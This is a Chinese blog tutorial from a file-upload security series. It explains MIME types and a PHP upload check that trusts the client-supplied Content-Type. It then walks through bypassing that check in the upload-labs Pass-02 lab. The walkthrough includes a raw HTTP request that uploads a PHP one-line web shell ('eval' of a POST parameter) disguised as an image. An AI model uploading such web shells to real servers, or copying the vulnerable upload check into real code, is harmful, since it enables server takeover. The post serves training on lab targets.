png文件头_【文件上传专题03】服务端MIME类型检测绕过

最新推荐文章于 2022-07-14 13:35:39 发布
最新推荐文章于 2022-07-14 13:35:39 发布
阅读量435 收藏
点赞数
文章标签: png文件头 upload上传 内容绕过 以下哪些可以成为html文件的扩展名 怎么修改file文件框的无文件提示

0x00 MIME简述

MIME (*M*ultipurpose *I*nternet *M*ail *E*xtensions) 是用来描述消息内容类型,和文件的扩展名有关系。

参考https://www.w3school.com.cn/media/media_mimeref.asp

以下是几种文件的扩展名对应的MIME类型

395810285878074e4664d77b7598475d.png

0x02 MIME识别

通过文件的扩展名识别

这种方式能对文件进行简单直观的判别,不能进行本质性的判别,一旦文件扩展名被修改了,就会判断失误。

通过文件数据的头部分识别

一般文件头记录了一些特征信息,可以利用这些特征信息对文件类型进行判别,这种方式较为本质,可信度较高。

参考https://mimesniff.spec.whatwg.org/

使用python识别文件MIME类型

python中使用filetype这个模块识别文件MIME类型,测试下识别图片结果如下。可以看出是通过识别内容的前4个字节识别。

import filetypedef main():    kind = filetype.guess('20200506001536.png')    if kind is None:        print('Cannot guess file type!')        return    print('File extension: %s' % kind.extension)    print('File MIME type: %s' % kind.mime)if __name__ == '__main__':    main()
打印如下File extension: pngFile MIME type: image/png

10fbbfa8637cb587fcbda1bf799a1e3f.png

0x03 MIME检测原理

通过使用 PHP 的全局数组 $_FILES,你可以从客户计算机向远程服务器上传文件。这里判断了上传文件类型

是否image/jpeg,image/png,image/gif三种类型。如果不属于这三种类型就提示文件类型不正确,请重新上传。

$_FILES["file"]["name"] - 上传文件的名称$_FILES["file"]["type"] - 上传文件的类型$_FILES["file"]["size"] - 上传文件的大小,以字节计$_FILES["file"]["tmp_name"] - 存储在服务器的文件的临时副本的名称$_FILES["file"]["error"] - 由文件上传导致的错误代码
$is_upload = false;$msg = null;if (isset($_POST['submit'])) {    if (file_exists(UPLOAD_PATH)) {        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {            $temp_file = $_FILES['upload_file']['tmp_name'];            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']                        if (move_uploaded_file($temp_file, $img_path)) {                $is_upload = true;            } else {                $msg = '上传出错!';            }        } else {            $msg = '文件类型不正确,请重新上传!';        }    } else {        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';    }}

0x04 修改上传数据包中MIME类型绕过

将Content-Type: application/octet-stream修改为允许上传的类型如image/jpeg(Content-Type: image/jpeg)

即可上传成功。

POST /Pass-02/index.php HTTP/1.1Host: 192.168.181.138:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Referer: http://192.168.181.138:8080/Pass-02/index.phpDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------------------287393275228683Content-Length: 353-----------------------------287393275228683Content-Disposition: form-data; name="upload_file"; filename="xiaoma.php"Content-Type: application/octet-stream<?php eval(@$_POST['a']);phpinfo() ?>-----------------------------287393275228683Content-Disposition: form-data; name="submit"丕传-----------------------------287393275228683--

7a28f046318c26c5d8dd6c9b58f571e6.png

741f2e7c7afc99a374507e55453e90ee.png

weixin_39693101
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php结合web uploader插件实现分片上传文件
12-18
Web Uploader是一款强大的JavaScript文件上传组件,尤其适合处理大文件上传和断点续传等高级需求。以下是对实现这一功能的详细步骤的阐述。 首先,我们需要在HTML页面中引入Web Uploader的CSS和JS文件。这可以通过...
web前端开发upload上传像js示例代码
10-21
接下来,为了满足阿里云等云存储服务的上传要求,我们需要对base64字符串进行处理,去除`data:`前缀和对应的MIME类型信息,转换为Blob对象。这里定义了两个辅助函数:`binaryblob`用于将base64字符串转化为Blob,`...
MIME类型服务端验证上传文件类型的讨论
SiC B2B2C Shop大型B2B2C商城软件产品,使用Java语言开发,高性能高扩展性高安全性分布式。可帮助你快速的建立大型B2B2C电商系统
09-19 812
      MIME的作用 : 使客户端软件,区分不同种类的数据,例如web浏览器就是通过MIME类型来判断文件是GIF图片,还是可打印的PostScript文件。       web服务器使用MIME来说明发送数据的种类, web客户端使用MIME来说明希望接收到的数据种类。       Tomcat的安装目录\conf\web.xml 中就定义了大量MIME类型 ,你可也去看一下。   ...
png文件上传(浏览器方式)
佳佳乐的博客
09-08 1264
1.修改配置文件 server.port=9082 spring.servlet.multipart.enabled=true spring.servlet.multipart.max-file-size=3MB spring.servlet.multipart.max-request-size=3MB 2.编写程序: import org.springframework.beans.f...
Android MIME类型
pengjianbosoft的专栏
07-29 1362
一、MIME TYPE描述 多用途互联网邮件扩展(MIME,Multipurpose Internet Mail Extensions)是一个互联网标准,它扩展了电子邮件标准,使其能够支持非ASCII字符、二进制格式附件等多种格式的邮件消息。 内容类型(Content
upload-labs_less1_less2_绕过前端js校验_MIME检查绕过_
qq_51550750的博客
04-10 1041
关于靶场说几点:单纯用phpstudy 可能无法复现所有的漏洞,而且phpstudy中的php可能是线程不安全的,所以建议大家在自己本机或者虚拟机的中亲自搭建一下apache和php的环境,便于复现upload-labs的所有靶场环境。配置有问题的可以参考我写的这篇文章: https://blog.csdn.net/qq_51550750/article/details/124062273 上面这篇博客记录了我为了搭建有些不能在phpstudy中复现而能在自己搭建的apache+php中复现的过程。 再次补
服务端下载图片,显示进度条,和自动安装apk
06-25
Intent的ACTION_VIEW action配合MIME类型"application/vnd.android.package-archive"可以触发系统安装器。 以下是代码示例: ```java // 下载图片 OkHttpClient client = new OkHttpClient(); Request request = ...
android上传图片至服务器转整理.pdf
01-31
- `MultipartEntity`或`RequestBody`:为了上传文件,通常会使用MIME类型的多部分形式数据,这可以通过Android的`MultipartEntity`(旧版)或Retrofit的`RequestBody`来实现。 - 请求参数设置:在请求中设置...
MIME类型是什么
qq_35456400的博客
03-02 550
浏览器能打开各式各样的文件,针对不同的文件,浏览器需要调用不同的应用程序去解析,比如PNG图像后缀 .png,程序需要把他识别为图片,au声音文件后缀.au,程序需要把他识别成声音。MIME类型是设定某种扩展名文件用一种应用程序来打开的方式类型。浏览器请求服务器会返回文件,根据文件类型我们可以调用不同的程序解析。 MIME文件格式可以看百度百科 ...
在线检测上传图像文档文件mime类型
大白菜啊
07-14 989
获取上传图像文档文件mime
常见的MIME类型
少年啦飞啦的博客
11-21 1501
互联网媒体类型,也叫做MIME类型,在Http协议消息中,使用Content-Type来表示具体请求中的媒体类型信息。 例如:Content-Type: text/html;charset:utf-8; 常见的媒体格式类型如下: text/htmlHTML格式 text/plain :纯文本格式 text/xml :XML格式 image/gif :gif图片格式...
常见文件对应的MIMEType类型
xm2by的博客
12-14 3978
常见文件对应的MIMEType类型 序号 文件格式 对应MIMEType类型 1 .png image/png 2 .jpeg image/jpeg 3 .jpg image/jpeg 4 .gif image/gif 5 .webp image/webp 6 .xls application/vnd.ms-excel 7 .xlsx application...
Upload-labs文件上传漏洞(MIME限制)——Pass02(详解)
Zichel77的博客
07-27 1018
0×00 题目描述 本题要求对数据包中的MIME进行检查 0×01 MIME介绍 所以首先要搞清楚MIME在数据包的哪里,MIME是个什么 关于MIME,由百度百科可知 MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式。 即文件的后缀 常见..
常见文件mime类型
walle2928的博客
03-01 8343
常见文件mime类型,key为文件扩展名,value为mime类型,可另存为json文件随时查找。 取自tomcat9.0.12配置文件web.xml。 { "123": "application/vnd.lotus-1-2-3", "3dml": "text/vnd.in3d.3dml", "3ds": "image/x-3ds", "3
常用文件mimemimetype对应关系
weixin_42508745的博客
07-21 1036
mimetypes    mimes “image/jpeg”    “jpg” “image/jpeg”    “jpeg” “image/png”    “png” “image/webp”    “webp” “application/vnd.ms-excel”    “xls” “application/vnd.openx
常用文件mimemimetype的对应关系
bingguang1993的博客
01-29 7680
mimetypes    mimes “image/jpeg”    “jpg” “image/jpeg”    “jpeg” “image/png”    “png” “image/webp”    “webp” “application/vnd.ms-excel”    “xls” “application/vnd.openxmlformats-officedocument.spreadshe...
让linux 支持视频格式,配置 Nginx 支持 f4v视频格式播放
weixin_33186395的博客
05-12 863
Nginx默认不支持f4v视频格式播放,解决方法为编辑mime.types文件,在video/mp4加上f4v即可types {# Data interchangeapplication/atom+xml atom;application/json json map topojson;application/ld+json...
PHP文件上传基础与MIME类型详解
通过`$_FILES['userfile']['type']`,我们可以获取到上传文件MIME类型。例如,如果要限制上传为TXT文件,可以检查MIME类型是否为`text/plain`。但要注意,客户端提供的MIME类型可能不可靠,因此最好也基于文件扩展...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值